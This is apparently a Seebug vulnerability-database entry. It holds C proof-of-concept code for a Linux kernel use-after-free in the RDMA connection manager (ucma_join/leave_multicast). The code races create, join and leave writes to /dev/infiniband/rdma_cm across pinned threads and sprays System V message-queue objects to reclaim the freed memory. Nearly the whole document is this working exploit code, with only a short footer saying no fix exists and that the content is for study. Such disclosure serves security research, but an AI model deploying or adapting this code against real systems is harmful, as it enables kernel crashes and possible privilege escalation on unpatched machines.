#define _GNU_SOURCE #include <endian.h> #include <linux/futex.h> #include <pthread.h> #include <stdint.h> #include <stdlib.h> #include <string.h> #include <sys/syscall.h> #include <unistd.h> #include <stdio.h> #include <sys/mman.h> #include <sys/ipc.h> #include <sys/msg.h> #include <sys/time.h> #include <sched.h> #define SEND 1 #define RECV 0 #define RDMATHREADS 30 static void test(); void createThreads(); void testTreadWake(); void exitRdmaThreads(); void loop() { createThreads(); while (1) { test(); } } struct thread_t { int created, running, call, CPUNumber, exitFlag; pthread_t th; }; struct msgInfo { int msgid; int CPUNumber; int sendOrRecv; //true: send ; false: recv }; struct { long mtype; char mtext[0xAC]; //char mtext[0xB0]; } msg = {0x42, {0}}; static struct thread_t *threads; static void execute_call(int call); static int running; static int collide; int threadWaittingNum = 0; int sendCount = 0; int *sendNum = 0; int *threadWaitting; int *threadRunning; int *ipcThreadStop; void setAffinity(void* arg); static void* thr(void* arg) { struct thread_t* th = (struct thread_t*)arg; struct msgInfo setRdmaCPUInfo; setRdmaCPUInfo.CPUNumber = th->CPUNumber; setAffinity(&setRdmaCPUInfo); for (;;) { while (!__atomic_load_n(&th->running, __ATOMIC_ACQUIRE)) { syscall(SYS_futex, &th->running, FUTEX_WAIT, 0, 0); } if(__atomic_load_n(&th->exitFlag, __ATOMIC_ACQUIRE)) { syscall(SYS_futex, &th->running, FUTEX_WAKE); pthread_detach(pthread_self()); return 0; } execute_call(th->call); __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED); __atomic_store_n(&th->running, 0, __ATOMIC_RELEASE); syscall(SYS_futex, &th->running, FUTEX_WAKE); } return 0; } int threadNum = 0; void createThreads() { int policy = 0; int max_prio_for_policy = 0; threads = mmap(NULL, sizeof(struct thread_t)*RDMATHREADS, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); for (int thread = 0; thread < RDMATHREADS; thread++) { struct thread_t* th = &threads[thread]; if (!th->created) { th->created = 1; th->exitFlag = 0; th->CPUNumber = (thread==0 ? 0 : 1); pthread_attr_t attr; pthread_attr_init(&attr); pthread_attr_setstacksize(&attr, 128 << 10); if(thread == 0) { pthread_create(&th->th, &attr, thr, th); perror("Warning_1111: "); } else pthread_create(&th->th, &attr, thr, th); pthread_attr_getschedpolicy(&attr, &policy); max_prio_for_policy = sched_get_priority_min(policy); pthread_setschedprio(th->th, max_prio_for_policy); pthread_attr_destroy(&attr); } } } void readTime(int call) { struct timeval tv; printf("run at %d\n",call); gettimeofday(&tv,NULL); printf("sendNum is ==== %d at %d \n", __atomic_load_n(sendNum, __ATOMIC_ACQUIRE), call); printf("millisecond:%ld\n",tv.tv_sec*1000000 + tv.tv_usec); return; } uint64_t r[3] = {0xffffffffffffffff, 0xffffffff, 0xffffffff}; uint64_t procid; void execute_call(int call) { //printf("call is %d\n",call); long res; switch (call) { case 0: *(uint32_t*)0x20000080 = 0; //printf("create.........\n"); *(uint16_t*)0x20000084 = 0x18; *(uint16_t*)0x20000086 = 0xfa00; *(uint64_t*)0x20000088 = 2; *(uint64_t*)0x20000090 = 0x20000040; *(uint16_t*)0x20000098 = 0x111; *(uint8_t*)0x2000009a = 0xd; *(uint8_t*)0x2000009b = 0; *(uint8_t*)0x2000009c = 0; *(uint8_t*)0x2000009d = 0; *(uint8_t*)0x2000009e = 0; *(uint8_t*)0x2000009f = 0; res = syscall(__NR_write, r[0], 0x20000080, 0x20); // create if (res != -1) r[1] = *(uint32_t*)0x20000040; break; case 1: printf("join.........\n"); *(uint32_t*)0x20000180 = 0x16; *(uint16_t*)0x20000184 = 0x98; *(uint16_t*)0x20000186 = 0xfa00; *(uint64_t*)0x20000188 = 0x20000140; *(uint64_t*)0x20000190 = 3; *(uint32_t*)0x20000198 = r[1]; *(uint16_t*)0x2000019c = 0x10; *(uint16_t*)0x2000019e = 1; *(uint16_t*)0x200001a0 = 2; *(uint16_t*)0x200001a2 = htobe16(0x4e23); *(uint8_t*)0x200001a4 = 0xac; *(uint8_t*)0x200001a5 = 0x14; *(uint8_t*)0x200001a6 = 0x14; *(uint8_t*)0x200001a7 = 0xbb; *(uint8_t*)0x200001a8 = 0; *(uint8_t*)0x200001a9 = 0; *(uint8_t*)0x200001aa = 0; *(uint8_t*)0x200001ab = 0; *(uint8_t*)0x200001ac = 0; *(uint8_t*)0x200001ad = 0; *(uint8_t*)0x200001ae = 0; *(uint8_t*)0x200001af = 0; __atomic_store_n(sendNum, 0, __ATOMIC_RELEASE); //readTime(1); res = syscall(__NR_write, r[0], 0x20000180, 0xa0); // ucma_join_multicast alloc "mc", and then the function will free it and "ctx", if there are some error. //readTime(11111); if (res != -1) r[2] = *(uint32_t*)0x20000140; break; case 2: //printf("leave.........\n"); *(uint32_t*)0x20000240 = 0x11; *(uint16_t*)0x20000244 = 0x10; *(uint16_t*)0x20000246 = 0xfa00; *(uint64_t*)0x20000248 = 0x20000100; *(uint32_t*)0x20000250 = 0; // set id *(uint32_t*)0x20000254 = 0; __atomic_store_n(sendNum, 0, __ATOMIC_RELEASE); //readTime(2); syscall(__NR_write, r[0], 0x20000240, 0x18); // ucma_leave_multicast() find "mc", and use it and "ctx". Crash in it. break; } } void runJoin() { __atomic_store_n(threadRunning, 1, __ATOMIC_RELEASE); syscall(SYS_futex, threadWaitting, FUTEX_WAKE, threadWaittingNum, NULL, NULL, 0); struct thread_t* th = &threads[0]; if (th->created) { __atomic_store_n(&th->call, 1, __ATOMIC_RELEASE); __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED); __atomic_store_n(&th->running, 1, __ATOMIC_RELEASE); syscall(SYS_futex, &th->running, FUTEX_WAKE); } } int count = 0; void runCreateOrLeave(int call, int threadNum) { struct thread_t* th = &threads[threadNum]; // 0 or 1 struct timespec ts; if (th->created) { __atomic_store_n(&th->call, call, __ATOMIC_RELEASE); __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED); __atomic_store_n(&th->running, 1, __ATOMIC_RELEASE); syscall(SYS_futex, &th->running, FUTEX_WAKE); } ts.tv_sec = 0; ts.tv_nsec = 20 * 1000 * 1000; syscall(SYS_futex, &th->running, FUTEX_WAIT, 1, &ts); } void runCreateOrLeaveNoWait(int call, int threadNum) { struct thread_t* th = &threads[threadNum]; if (th->created) { __atomic_store_n(&th->call, call, __ATOMIC_RELEASE); __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED); __atomic_store_n(&th->running, 1, __ATOMIC_RELEASE); syscall(SYS_futex, &th->running, FUTEX_WAKE); } } void exitRdmaThreads() { struct timespec ts; struct thread_t* th; th = &threads[0]; ts.tv_sec = 0; ts.tv_nsec = 20 * 1000 * 1000; syscall(SYS_futex, &th->running, FUTEX_WAIT, 1, &ts); for(int i = 0; i < RDMATHREADS; i++) { th = &threads[i]; if (th->created) { th->created = 0; __atomic_store_n(&th->exitFlag, 1, __ATOMIC_RELEASE); __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED); __atomic_store_n(&th->running, 1, __ATOMIC_RELEASE); syscall(SYS_futex, &th->running, FUTEX_WAKE); struct timespec ts; ts.tv_sec = 0; ts.tv_nsec = 20 * 1000 * 1000; syscall(SYS_futex, &th->running, FUTEX_WAIT, 1, &ts); } } munmap(threads, sizeof(struct thread_t)*RDMATHREADS); if(sendCount) syscall(SYS_futex, ipcThreadStop, FUTEX_WAIT, 1, NULL, NULL, 0); } void setAffinity(void *arg) { int i; cpu_set_t mask; cpu_set_t get; int cpuId = ((struct msgInfo*)arg)->CPUNumber; CPU_ZERO(&mask); CPU_SET(cpuId, &mask); if (pthread_setaffinity_np(pthread_self(), sizeof(mask), &mask) < 0) { fprintf(stderr, "set thread affinity failed\n"); } CPU_ZERO(&get); if (pthread_getaffinity_np(pthread_self(), sizeof(get), &get) < 0) { fprintf(stderr, "get thread affinity failed\n"); } } void *holeThread(struct msgInfo *msgInfo) { int msgid = msgInfo->msgid; setAffinity(&msgInfo); if(msgInfo->sendOrRecv == SEND) { while(1) { __atomic_fetch_add(&threadWaittingNum, 1, __ATOMIC_RELAXED); syscall(SYS_futex, threadWaitting, FUTEX_WAIT, 1, NULL, NULL, 0); while(__atomic_load_n(threadRunning, __ATOMIC_ACQUIRE)) { if (msgsnd(msgid, &msg, sizeof(msg.mtext), 0) == -1) { perror("msgsnd"); exit(1); } __atomic_fetch_add(&sendCount, 1, __ATOMIC_RELAXED); __atomic_fetch_add(sendNum, 1, __ATOMIC_RELAXED); } __atomic_fetch_sub(&threadWaittingNum, 1, __ATOMIC_RELAXED); } } else { while(1) { __atomic_fetch_add(&threadWaittingNum, 1, __ATOMIC_RELAXED); syscall(SYS_futex, threadWaitting, FUTEX_WAIT, 1, NULL, NULL, 0); int tSendCount = 0; while(__atomic_load_n(&sendCount, __ATOMIC_ACQUIRE)) { if(__atomic_load_n(&sendCount, __ATOMIC_ACQUIRE)<5) { usleep(1000*1000); continue; } if (msgrcv(msgid, &msg, sizeof(msg.mtext), 0x42, 0) == -1) { perror("msgrcv error !!!!"); exit(1); } __atomic_fetch_sub(&sendCount, 1, __ATOMIC_RELAXED); __atomic_fetch_add(&tSendCount, 1, __ATOMIC_RELAXED); } syscall(SYS_futex, ipcThreadStop, FUTEX_WAKE); __atomic_fetch_sub(&threadWaittingNum, 1, __ATOMIC_RELAXED); } } } void createHoleThreads(struct msgInfo *msgInfo) { pthread_t tid; pthread_attr_t thAttr; int policy = 0; int max_prio_for_policy = 0; if (pthread_create(&tid, NULL, (void *)holeThread, msgInfo) != 0) { perror("create thread"); fprintf(stderr, "thread create failed\n"); return; } pthread_attr_init(&thAttr); pthread_attr_getschedpolicy(&thAttr, &policy); max_prio_for_policy = sched_get_priority_max(policy); pthread_setschedprio(tid, max_prio_for_policy); pthread_attr_destroy(&thAttr); return; } void test() { printf("===== run test %d ====\n",count++); long res = -1; memcpy((void*)0x20000680, "/dev/infiniband/rdma_cm", 24); res = syscall(__NR_openat, 0xffffffffffffff9c, 0x20000680, 2, 0); if (res != -1) r[0] = res; collide = 1; runCreateOrLeave(0, 1); // run rdma create on CPU 0 and Thread 1 runJoin(); // run rdma Join on CPU 0 and Thread 0 for(int i = 3; i < RDMATHREADS; i++) runCreateOrLeaveNoWait(2, i); // run rdma leave on CPU 1 and Thread [3:RDMATHREADS-1] runCreateOrLeave(2, 2); // run rdma leave on CPU 1 and Thread 2 __atomic_store_n(threadRunning, 0, __ATOMIC_RELEASE); if(res != -1) close(res); } void testTreadWake() { syscall(SYS_futex, threadWaitting, FUTEX_WAKE, 200, NULL, NULL, 0); perror("threadWaitting_1: "); } int main() { syscall(__NR_mmap, 0x20000000, 0x1000000, 3, 0x32, -1, 0); memset(msg.mtext, '\x41', sizeof(msg.mtext)); int pid = 0; int msgid = 0; struct msgInfo sendHoleInfo; struct msgInfo recvHoleInfo; struct msgInfo sendHoleInfo_1; struct msgInfo recvHoleInfo_1; threadWaitting = mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); *threadWaitting = 1; threadRunning = mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); *threadRunning = 0; ipcThreadStop = mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); *ipcThreadStop = 1; sendNum = mmap(NULL, sizeof(int), PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_SHARED, -1, 0); *sendNum = 0; if ((msgid = msgget(IPC_PRIVATE, 0644 | IPC_CREAT)) == -1) { perror("msgget"); exit(1); } sendHoleInfo.msgid = msgid; sendHoleInfo.sendOrRecv = SEND; sendHoleInfo.CPUNumber = 0; recvHoleInfo.msgid = msgid; recvHoleInfo.sendOrRecv = RECV; recvHoleInfo.CPUNumber = 1; printf("Creating ipc msg threads\n"); for(int i = 0; i < 250; i++) { createHoleThreads(&sendHoleInfo); } for(int i = 0; i < 150; i++) { createHoleThreads(&recvHoleInfo); } printf("Ipc msg threads are created\n"); for (procid = 0; procid < 1; procid++) { if (fork() == 0) { //for (;;) { loop(); //} } } printf("ending..................\n"); sleep(1000000); return 0; }
暂无临时解决方案
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩:
次
本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论